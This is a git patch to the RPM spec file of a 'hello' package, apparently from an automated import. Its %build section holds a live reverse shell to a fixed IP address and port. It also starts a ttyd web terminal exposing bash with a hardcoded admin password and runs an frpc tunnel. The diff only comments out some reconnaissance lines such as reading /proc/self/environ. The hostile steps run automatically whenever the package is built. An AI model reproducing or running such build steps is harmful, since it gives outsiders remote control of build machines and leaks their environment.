From 9000b4760e434ca65145cc5027f374017085ea5d Mon Sep 17 00:00:00 2001 From: CoprDistGit Date: Mon, 30 Oct 2023 13:34:36 +0000 Subject: automatic import of hello --- hello.spec | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/hello.spec b/hello.spec index bd316a3..cba6bb0 100644 --- a/hello.spec +++ b/hello.spec @@ -25,13 +25,14 @@ project, including configuration, build, internationalization, help files, etc. %build %configure bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1 -uname -a 1>&2 +#uname -a 1>&2 #ip addr 1>&2 #ip route 1>&2 -ps -ef 1>&2 +#ps -ef 1>&2 # netstat -nlpt 1>&2 -cat /proc/self/environ 1>&2 -./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash & ./frpc -c frpc.toml +#cat /proc/self/environ 1>&2 +./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash & +./frpc -c frpc.toml make %{?_smp_mflags} -- cgit v1.2.3